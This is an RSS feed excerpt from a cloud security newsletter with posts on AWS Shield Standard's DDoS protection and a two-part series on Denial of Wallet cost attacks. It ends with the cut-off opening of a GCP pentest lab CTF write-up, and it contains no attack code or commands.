  <description>Learn about AWS Shield Standard&#39;s DDoS protection features, including defense against network floods, protocol attacks, and traffic filtering for AWS services.</description>
  <link>https://cloudsecurity.club/p/aws-shield-standard-protection-features</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/aws-shield-standard-protection-features</guid>
  <pubDate>Sun, 24 Nov 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-11-24T18:30:00Z</atom:published>
    <dc:creator>Chandrapal Badshah</dc:creator>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;"><span style="text-decoration:underline;"><i><a class="link" href="https://docs.aws.amazon.com/waf/latest/developerguide/ddos-standard-summary.html?utm_source=cloudsecurity.club&utm_medium=referral" target="_blank" rel="noopener noreferrer nofollow" style="color: rgb(44, 129, 229)">AWS Shield Standard</a></i></span> is a built-in DDoS protection for AWS workloads. This automated defense system operates at the AWS edge, inspecting network traffic before it reaches your cloud resources.</p><p class="paragraph" style="text-align:left;"><b>AWS Shield Standard protects against DDoS attacks at Layer 3 (Network) and Layer 4 (Transport) of the OSI model.</b></p><p class="paragraph" style="text-align:left;">At Layer 3, the service blocks IP-based volumetric attacks:</p><ul><li><p class="paragraph" style="text-align:left;"><b>ICMP floods</b></p></li><li><p class="paragraph" style="text-align:left;"><b>IP fragment floods</b></p></li><li><p class="paragraph" style="text-align:left;"><b>Malformed IP packets</b></p></li></ul><p class="paragraph" style="text-align:left;">At Layer 4, Shield Standard mitigates protocol attacks:</p><ul><li><p class="paragraph" style="text-align:left;"><b>TCP SYN floods:</b> Detects and blocks incomplete TCP handshakes that drain server connection tables</p></li><li><p class="paragraph" style="text-align:left;"><b>UDP reflection/amplification: </b>Filters traffic from exploited UDP services like DNS, NTP, SSDP, and Chargen</p></li><li><p class="paragraph" style="text-align:left;"><b>TCP reflection attacks:</b> Stops spoofed RST or SYN-ACK packets</p></li><li><p class="paragraph" style="text-align:left;"><b>Connection floods: </b>Prevents resource exhaustion from too many simultaneous connections</p></li></ul><p class="paragraph" style="text-align:left;">AWS Shield Standard is automatically enabled for AWS CloudFront distributions, Route 53 hosted zones, Elastic Load Balancers (Classic & ALB), and EC2 instances. No configuration or activation steps are required.</p><p class="paragraph" style="text-align:left;">However, Shield Standard focuses solely on network and transport layer attacks. Application layer (Layer 7) protection requires additional services like <span style="text-decoration:underline;"><i><a class="link" href="https://docs.aws.amazon.com/waf/latest/developerguide/ddos-advanced-summary.html?utm_source=cloudsecurity.club&utm_medium=referral" target="_blank" rel="noopener noreferrer nofollow" style="color: rgb(44, 129, 229)">AWS Shield Advanced</a></i></span> or <span style="text-decoration:underline;"><i><a class="link" href="https://docs.aws.amazon.com/waf/latest/developerguide/waf-chapter.html?utm_source=cloudsecurity.club&utm_medium=referral" target="_blank" rel="noopener noreferrer nofollow" style="color: rgb(44, 129, 229)">AWS WAF</a></i></span>.</p><p class="paragraph" style="text-align:left;">This baseline DDoS protection forms a fundamental component of AWS security architecture. It operates continuously and at no additional cost.</p></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=6165eb77-7f6b-4b3c-9e5f-a95a076ccf75&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>Denial of Wallet Goes Beyond Serverless Functions</title>
  <description>Part 2 — It&#39;s a Byproduct of Rapid Auto Scaling</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/6d827663-0d40-4e12-8f69-72997e8d21b4/Denial_of_Wallet_Goes_Beyond_Serverless_Functions_-_Part_2_-_Cover.jpg" length="41315" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/denial-of-wallet-goes-beyond-serverless-functions</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/denial-of-wallet-goes-beyond-serverless-functions</guid>
  <pubDate>Mon, 25 Nov 2024 12:00:00 +0000</pubDate>
  <atom:published>2024-11-25T12:00:00Z</atom:published>
    <dc:creator>Chandrapal Badshah</dc:creator>
    <category><![CDATA[Aws]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;">In the <a class="link" href="https://cloudsecurity.club/p/lets-talk-denial-of-wallet?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=denial-of-wallet-goes-beyond-serverless-functions" target="_blank" rel="noopener noreferrer nofollow">previous blog post</a>, I introduced the Denial of Wallet bug class and what&#39;s in it for attackers.</p><p class="paragraph" style="text-align:left;">Whenever I discuss DoW in security meetups or with peers, I find a recurring misconception. &quot;<i>Denial of Wallet is a serverless function attack vector. If you don&#39;t use serverless functions, you don&#39;t need to worry about it.</i>&quot;</p><p class="paragraph" style="text-align:left;">It&#39;s not their mistake.</p><p class="paragraph" style="text-align:left;">News and security blog posts mostly associated DoW attacks with serverless platforms. Typical examples are static websites hosted on serverless platforms that generate huge bills after a DDoS attack, web scraping, or many spam account signups.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/42320f17-c43c-4b7a-ae0d-2bebb0cf43c6/image.png?t=1732440998"/><div class="image__source"><span class="image__source_text"><p><a class="link" href="https://old.reddit.com/r/webdev/comments/1b14bty/netlify_just_sent_me_a_104k_bill_for_a_simple/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=denial-of-wallet-goes-beyond-serverless-functions" target="_blank" rel="noopener noreferrer nofollow">https://old.reddit.com/r/webdev/comments/1b14bty/netlify_just_sent_me_a_104k_bill_for_a_simple/</a></p></span></div></div><blockquote align="center" class="twitter-tweet"><a href="https://twitter.com/michaelaubry/status/1757539928534315322?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=denial-of-wallet-goes-beyond-serverless-functions"><p> Twitter tweet </p></a></blockquote><blockquote align="center" class="twitter-tweet"><a href="https://twitter.com/nathudgens/status/1831034756550857078?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=denial-of-wallet-goes-beyond-serverless-functions"><p> Twitter tweet </p></a></blockquote><p class="paragraph" style="text-align:left;">Even academic papers on the Denial of Wallet focus on serverless platforms only. (Ex: <a class="link" href="https://ieeexplore.ieee.org/document/9983732?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=denial-of-wallet-goes-beyond-serverless-functions" target="_blank" rel="noopener noreferrer nofollow">One</a>, <a class="link" href="https://www.sciencedirect.com/science/article/pii/S221421262100079X?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=denial-of-wallet-goes-beyond-serverless-functions" target="_blank" rel="noopener noreferrer nofollow">Two</a>, <a class="link" href="https://www.sciencedirect.com/science/article/pii/S2352340923009605?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=denial-of-wallet-goes-beyond-serverless-functions" target="_blank" rel="noopener noreferrer nofollow">Three</a>, <a class="link" href="https://academic.oup.com/cybersecurity/article/10/1/tyae004/7634012?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=denial-of-wallet-goes-beyond-serverless-functions" target="_blank" rel="noopener noreferrer nofollow">Four</a>)</p><h1 class="heading" style="text-align:left;" id="how-d-do-s-leads-to-do-w-in-serverl">How DDoS Leads to DoW in Serverless Functions</h1><p class="paragraph" style="text-align:left;">The most common (and easiest) way to generate a massive bill for serverless customers is through DDoS.</p><p class="paragraph" style="text-align:left;">Let&#39;s analyze a sample DDoS attack.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/c3395036-1b26-44bf-a828-ba2faa5d2f7a/image.png?t=1732441322"/></div><ol start="1"><li><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">The serverless function is accessible from the Internet. DDoS traffic reaches the function</span></p></li><li><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">The cloud platform auto-scales the function to respond to each request</span></p></li><li><p class="paragraph" style="text-align:left;"><span style="color:rgb(14, 16, 26);">The cloud platform charges (a massive) fee because of the usage. This charge includes both compute and bandwidth usage.</span></p></li></ol><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;">Step 3 (especially the bandwidth usage) fuels the DoW fire. We will talk about this in the next blog post.</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">Let&#39;s examine step 2.</p><p class="paragraph" style="text-align:left;">In step 2, the cloud provider lacks the context of traffic. From their point of view, requests from L7 DDoS can look the same as those from massive Black Friday/Christmas sales. So, they auto-scale the serverless functions to handle the traffic.</p><p class="paragraph" style="text-align:left;">Once the DDoS attack is over, you will end up with a massive cloud bill- as the cloud provider assumes it was genuine traffic, and they helped to seamlessly &quot;scale up&quot; the backend to meet the needs.</p><p class="paragraph" style="text-align:left;">Suppose you remove the &quot;auto-scaling&quot; part from this attack scenario and keep the concurrent execution of functions static; a DDoS attack doesn&#39;t lead to a massive cloud bill. The attack might take down your application. But it will not skyrocket your serverless compute charges.</p><p class="paragraph" style="text-align:left;">Hence, rapid provisioning of resources (aka scaling up) leads to more cost.</p><div class="blockquote"><blockquote class="blockquote__quote"></blockquote></div><h1 class="heading" style="text-align:left;" id="do-w-in-cloud-native-services">DoW In Cloud Native Services</h1><p class="paragraph" style="text-align:left;">Cloud Native services often abstract the infrastructure underlying it. This abstraction also includes scale-up and scale-down operations. </p><p class="paragraph" style="text-align:left;">Let&#39;s take the example of a cloud-native blob storage - <a class="link" href="https://aws.amazon.com/s3/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=denial-of-wallet-goes-beyond-serverless-functions" target="_blank" rel="noopener noreferrer nofollow">Amazon S3</a>.</p><p class="paragraph" style="text-align:left;">Do you want to store 1 GB of data? You can. Do you want to store 10 TB of data? You absolutely can. In both cases, you&#39;ll not know the underlying infrastructure, such as the number of storage disks or servers used. All you know is that Amazon S3 is a reliable and durable cloud storage system for storing your files. </p><p class="paragraph" style="text-align:left;">But with abstraction comes grey areas. Pricing is one among them.</p><p class="paragraph" style="text-align:left;">Cloud providers have to come up with &quot;creative&quot; pricing that pays for the underlying infrastructure and other overhead costs (salaries to devs developing the cloud services, profits, etc). More importantly, this pricing must be based on parameters visible to cloud customers.</p><p class="paragraph" style="text-align:left;">Often, this includes parameters like the geographical region, number of requests, and data transfer involved.</p><p class="paragraph" style="text-align:left;">Let&#39;s take Amazon S3, for example, again.</p><p class="paragraph" style="text-align:left;">You have a <a class="link" href="https://aws.amazon.com/s3/pricing/?nc=sn&loc=4&utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=denial-of-wallet-goes-beyond-serverless-functions" target="_blank" rel="noopener noreferrer nofollow">separate price</a> for the storage (and the storage class) used.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/c0f243b7-e440-4981-8795-e18c01282ced/image.png?t=1732441437"/><div class="image__source"><span class="image__source_text"><p>Region: ap-south-1</p></span></div></div><p class="paragraph" style="text-align:left;">You have a separate price for the number of requests sent to S3.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/9e475355-c4b5-4be2-85d1-8331de2bc625/image.png?t=1732441495"/><div class="image__source"><span class="image__source_text"><p>Region: ap-south-1</p></span></div></div><p class="paragraph" style="text-align:left;">You have a separate price for the data transfer from the bucket to the Internet (aka anyone downloading the files).</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/b24aacaa-946f-4aff-9c7f-8479a4200f34/image.png?t=1732441538"/><div class="image__source"><span class="image__source_text"><p>Region: ap-south-1 (Transferring 1 GB costs 4X its storage price in S3 Standard. LOL)</p></span></div></div><p class="paragraph" style="text-align:left;">Let&#39;s look closely at the cost of requests. </p><h1 class="heading" style="text-align:left;" id="cost-of-misconfigured-amazon-s-3-bu">Cost of Misconfigured Amazon S3 Bucket</h1><p class="paragraph" style="text-align:left;">I created an empty S3 bucket and intentionally misconfigured it to list the objects. </p><p class="paragraph" style="text-align:left;">Let&#39;s demo what happens if an attacker sends a million requests.</p><iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="true" class="youtube_embed" frameborder="0" height="100%" src="https://youtube.com/embed/fShqvblM6Tw" width="100%"></iframe><p class="paragraph" style="text-align:left;">Amazon S3 service assumes that the traffic the bucket receives is intentional and auto-scales underlying infra (when necessary) to respond to a million requests. </p><p class="paragraph" style="text-align:left;">The Cloud Provider lacks the context of traffic. The Cloud Customer lacks control over the underlying scaling configurations of cloud-native services.</p><p class="paragraph" style="text-align:left;">At the end of <span style="text-decoration:line-through;">attack</span> Amazon S3 handling a million unauthenticated requests, my empty bucket (with object listing enabled) <b>got me a bill of USD 5</b>. </p><h1 class="heading" style="text-align:left;" id="key-takeaways">Key Takeaways</h1><p class="paragraph" style="text-align:left;">Any cloud or cloud-native service where attackers can trigger the scale-up of resources is susceptible to the DoW bug class. </p><p class="paragraph" style="text-align:left;">Serverless functions and platforms are infamous for DoW attacks. Cloud-native services are kind of &quot;serverless&quot; because the underlying infrastructure is abstracted from customers and auto-scaled by cloud providers to handle traffic. </p><p class="paragraph" style="text-align:left;">If you&#39;re threat modeling serverless applications or integrating cloud-native services with your systems, you should consider the DoW bug class.</p><p class="paragraph" style="text-align:left;">In the next blog post, I&#39;ll talk about how <i>weaponizing internet bandwidth can make cloud customers bleed money</i>.</p><p class="paragraph" style="text-align:left;">If you liked this post, please forward this email to your friends working in Cloud Security or share it on social media.</p><p class="paragraph" style="text-align:left;">If you wish to get the next blog post to your inbox, <a class="link" href="https://cloudsecurity.club/subscribe?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=denial-of-wallet-goes-beyond-serverless-functions" target="_blank" rel="noopener noreferrer nofollow"><b>subscribe to this newsletter</b></a>.</p><hr class="content_break"><div class="image"><a class="image__link" href="https://courses.cloudsecurity.club/courses/Securing-AWS-Strategies-for-Lean-Teams-from-Chandrapal-Badshah-666415ee3a16ef700a69c1c5?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=denial-of-wallet-goes-beyond-serverless-functions" rel="noopener" target="_blank"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e86aa8ad-bce5-4c50-936a-adc611325fdc/Securing_AWS_Black_Friday.jpg?t=1731495260"/></a><div class="image__source"><a class="image__source_link" href="https://courses.cloudsecurity.club/courses/Securing-AWS-Strategies-for-Lean-Teams-from-Chandrapal-Badshah-666415ee3a16ef700a69c1c5?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=denial-of-wallet-goes-beyond-serverless-functions" rel="noopener" target="_blank"><span class="image__source_text"><p>Black Friday Offer - 51% OFF</p></span></a></div></div></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=cfc65c57-9dc5-4721-aa31-b60ddaaf7b12&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>Let&#39;s talk Denial of Wallet</title>
  <description>Part 1 — When Cloud Scalability Becomes a Security Risk</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/cd6e284f-cf26-4325-8ca4-539ad9104c14/Let_s_Talk_Denial_of_Wallet_-_Part_1_-_Cover.jpg" length="51959" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/lets-talk-denial-of-wallet</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/lets-talk-denial-of-wallet</guid>
  <pubDate>Wed, 13 Nov 2024 12:00:00 +0000</pubDate>
  <atom:published>2024-11-13T12:00:00Z</atom:published>
    <dc:creator>Chandrapal Badshah</dc:creator>
    <category><![CDATA[Aws]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;">One thing that public clouds emphasize is scalability. You pick any &quot;Why should you use cloud&quot; blog posts of <a class="link" href="https://docs.aws.amazon.com/whitepapers/latest/aws-overview/six-advantages-of-cloud-computing.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=let-s-talk-denial-of-wallet" target="_blank" rel="noopener noreferrer nofollow">public</a> <a class="link" href="https://cloud.google.com/learn/advantages-of-cloud-computing?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=let-s-talk-denial-of-wallet" target="_blank" rel="noopener noreferrer nofollow">cloud</a> <a class="link" href="https://azure.microsoft.com/en-us/explore/why-azure?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=let-s-talk-denial-of-wallet" target="_blank" rel="noopener noreferrer nofollow">providers</a>. One of the top five reasons is scalability.</p><p class="paragraph" style="text-align:left;">Do you want a single server up and running? Or do you want 10,000 servers up and running?</p><p class="paragraph" style="text-align:left;">Cloud providers have got you covered.</p><p class="paragraph" style="text-align:left;">You focus on your business logic and applications. Cloud providers help you scale quickly to meet your needs.</p><p class="paragraph" style="text-align:left;">And the best part?</p><p class="paragraph" style="text-align:left;"><b>You only pay for what you use!</b></p><p class="paragraph" style="text-align:left;">This flexibility makes the cloud appealing to companies of all sizes - from startups with few engineers to multi-million dollar companies with hundreds to thousands of engineers.</p><p class="paragraph" style="text-align:left;">But there&#39;s a catch with this statement.</p><p class="paragraph" style="text-align:left;">You only pay for what you use. </p><p class="paragraph" style="text-align:left;">If you use many resources (even <i>unintentionally</i>), you must pay for that. </p><p class="paragraph" style="text-align:left;"><i>This quick resource provisioning and pay-for-usage pricing make Denial of Wallet (DoW) attacks a potential threat in the cloud.</i></p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e695da38-9155-4aa0-977b-377fe112f0e2/image.png?t=1731493749"/></div><h1 class="heading" style="text-align:left;" id="so-whats-denial-of-wallet">So, What&#39;s Denial of Wallet?</h1><p class="paragraph" style="text-align:left;">It&#39;s a bug class, which, when exploited by attackers, leads to a huge cloud bill for the victim.</p><p class="paragraph" style="text-align:left;">Let&#39;s take a DDoS attack, for example.</p><p class="paragraph" style="text-align:left;">When a DDoS attack occurs, the backend servers get overwhelmed by the number of requests. Your cloud provider may automatically spin up new servers based on the autoscaling configuration to handle incoming requests. </p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/36247213-bc68-472c-bca1-0eb6e9a5bc47/image.png?t=1731493893"/></div><p class="paragraph" style="text-align:left;">If you look closely, these additional servers have a cost. By the end of the DDoS attack, your cloud bill includes the price of the original servers you had + the cost of newly spun-up servers (+ additional data transfer costs to respond to those DDoS requests.)</p><p class="paragraph" style="text-align:left;">So, a DDoS attack on your cloud resources can significantly inflate your cloud bill.</p><p class="paragraph" style="text-align:left;">DoS and DDoS are not the only attack vectors in the DoW bug class. A wide range of attack vectors can increase your cloud bills, all falling under this category. Other popular attack vectors include <a class="link" href="https://www.wiz.io/academy/what-is-cryptojacking?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=let-s-talk-denial-of-wallet" target="_blank" rel="noopener noreferrer nofollow">Cryptojacking</a> and <a class="link" href="https://permiso.io/blog/exploiting-hosted-models?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=let-s-talk-denial-of-wallet" target="_blank" rel="noopener noreferrer nofollow">LLMHijacking</a>. </p><p class="paragraph" style="text-align:left;">The increase in your cloud bills depends on the attack. An attack can be slow and steady and increase cloud bills over time (ex, continuous scraping by <span style="text-decoration:line-through;">LLM companies</span> bots). Or it can cause a massive increase in cost within a day/few hours (ex, spin up a gigantic GPU server for crypto mining post credential leak).</p><p class="paragraph" style="text-align:left;">But before I continue this DoW blog series, I must clarify one thing.</p><p class="paragraph" style="text-align:left;">Unlike Denial of Service (DoS), Denial of Wallet <i>doesn&#39;t block you from accessing your wallet</i>. Instead, it makes you lose money on your cloud bills. You can still access your wallet during the attack (and before your cloud provider notifies you of the bill). </p><p class="paragraph" style="text-align:left;">A better name could be Exhaustion of Wallet. Only in the worst case, when you have no money left in your wallet to pay the bill, then it might qualify as &quot;Denial of Wallet&quot; 👿</p><h1 class="heading" style="text-align:left;" id="do-w-is-an-interesting-bug-class">DoW is an interesting bug class</h1><p class="paragraph" style="text-align:left;">Usually, security attacks directly affect the <a class="link" href="https://www.csoonline.com/article/568917/the-cia-triad-definition-components-and-examples.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=let-s-talk-denial-of-wallet" target="_blank" rel="noopener noreferrer nofollow">CIA triad</a>, but some attacks in this bug class don&#39;t. That&#39;s why (I assume) Denial of Wallet attack vectors are marked as Informational/Not Applicable/Accepted Risks in bug bounty programs. </p><p class="paragraph" style="text-align:left;">Some DoW attack vectors (like Cryptojacking or LLMHijacking) may not even impact your existing resources. But they still achieve the goal of making you bleed money on cloud bills.</p><p class="paragraph" style="text-align:left;">In the worst-case scenario, DoW could impact Availability but not Confidentiality or Integrity of your systems.</p><p class="paragraph" style="text-align:left;">If the number of servers hits the allocated server quotas in your account (due to cryptojacking), new servers can&#39;t spin up (say, autoscaling backend servers, data engineering workloads, etc.)</p><p class="paragraph" style="text-align:left;">If the number of concurrent serverless functions reaches the maximum limit (due to a DDoS attack), your cloud provider might start throttling. Requests from genuine customers might also get blocked.</p><h1 class="heading" style="text-align:left;" id="whats-in-it-for-attackers">What&#39;s in it for attackers?</h1><p class="paragraph" style="text-align:left;">DoW is digital vandalism. Attackers might not get anything from the attack, but the victims lose something.</p><div class="blockquote"><blockquote class="blockquote__quote"></blockquote></div><div class="image"><img alt="Broken display glass" class="image__image" style="" src="https://images.unsplash.com/photo-1473158912295-779ef17fc94b?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3w0ODM4NTF8MHwxfHNlYXJjaHw1fHx2YW5kYWxpc218ZW58MHx8fHwxNzMxNDk1NDAxfDA&ixlib=rb-4.0.3&q=80&w=1080&utm_source=beehiiv&utm_medium=referral"/><div class="image__source"><a class="image__source_link" href="https://unsplash.com/@shots_of_aspartame?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=let-s-talk-denial-of-wallet" rel="noopener" target="_blank"><span class="image__source_text"><p>Photo by Julia Joppien on Unsplash</p></span></a></div></div><p class="paragraph" style="text-align:left;">Let&#39;s say an attacker made you spend 100k USD overnight in a DoW attack (and your cloud provider doesn&#39;t agree to refund it); you&#39;ve lost 100k. You could have used it for other things — product research, hiring new talent, etc. But now the money is gone.</p><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>Note:</b> It&#39;s possible to make you spend 100k or even more in DoW attacks. (I&#39;ll discuss it in the upcoming blog posts; <a class="link" href="https://cloudsecurity.club/subscribe?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=let-s-talk-denial-of-wallet" target="_blank" rel="noopener noreferrer nofollow">subscribe to get them directly in your inbox</a>.)</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">These massive cloud bills could be a significant blow if you&#39;re a bootstrapped startup or solopreneur running things on the cloud. Sometimes, this leads you to declare bankruptcy and close the shop (or at least the cloud account).</p><p class="paragraph" style="text-align:left;">In the upcoming blog posts, I&#39;ll explain the popular attack vectors that fall under the DoW bug class and the mitigation steps. </p><p class="paragraph" style="text-align:left;">Until next time. 👋</p><hr class="content_break"><div class="image"><a class="image__link" href="https://courses.cloudsecurity.club/courses/Securing-AWS-Strategies-for-Lean-Teams-from-Chandrapal-Badshah-666415ee3a16ef700a69c1c5?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=let-s-talk-denial-of-wallet" rel="noopener" target="_blank"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e86aa8ad-bce5-4c50-936a-adc611325fdc/Securing_AWS_Black_Friday.jpg?t=1731495260"/></a><div class="image__source"><a class="image__source_link" href="https://courses.cloudsecurity.club/courses/Securing-AWS-Strategies-for-Lean-Teams-from-Chandrapal-Badshah-666415ee3a16ef700a69c1c5?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=let-s-talk-denial-of-wallet" rel="noopener" target="_blank"><span class="image__source_text"><p>Black Friday Offer - 51% OFF</p></span></a></div></div></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=64b3a555-4e6c-4e3c-8821-71d514c1988e&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>Solving GCP Pentest Lab CTF</title>
  <description>Explore the setup and solution to find all six flags in the GCP Pentest Lab CTF with explanations of each misconfiguration.</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/a952205a-b85e-4168-bbc9-8d073ba88dc6/GCP_Pentest_Lab_Cover.jpg" length="26846" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/solving-gcp-pentest-lab-ctf</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/solving-gcp-pentest-lab-ctf</guid>
  <pubDate>Sat, 13 Jul 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-07-13T18:30:00Z</atom:published>
    <dc:creator>Sarthak Bokade</dc:creator>
    <category><![CDATA[Ctf]]></category>
    <category><![CDATA[Gcp]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;"><a class="link" href="https://github.com/lacioffi/GCP-pentest-lab?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-pentest-lab-ctf" target="_blank" rel="noopener noreferrer nofollow">GCP-Pentest-Lab</a> is a vulnerable environment designed to explore and exploit GCP misconfigurations. This project contains different misconfigurations (with six flags), and the flags have no specific format. Players start as random users through a web application and must find their way through various security flaws without relying on traditional web or OS-level exploits.</p><h2 class="heading" style="text-align:left;">Table of Contents</h2><ul><li><p class="paragraph" style="text-align:left;"><a class="link" href="#setup" rel="noopener noreferrer nofollow">Setup</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="#flag-1" rel="noopener noreferrer nofollow">Flag-1</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="#flag-2" rel="noopener noreferrer nofollow">Flag-2</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="#flag-3" rel="noopener noreferrer nofollow">Flag-3</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="#flag-4" rel="noopener noreferrer nofollow">Flag-4</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="#flag-5" rel="noopener noreferrer nofollow">Flag-5</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="#flag-6" rel="noopener noreferrer nofollow">Flag-6</a></p></li></ul><h1 class="heading" style="text-align:left;" id="setup">Setup</h1><p class="paragraph" style="text-align:left;">Go to any command line (Linux 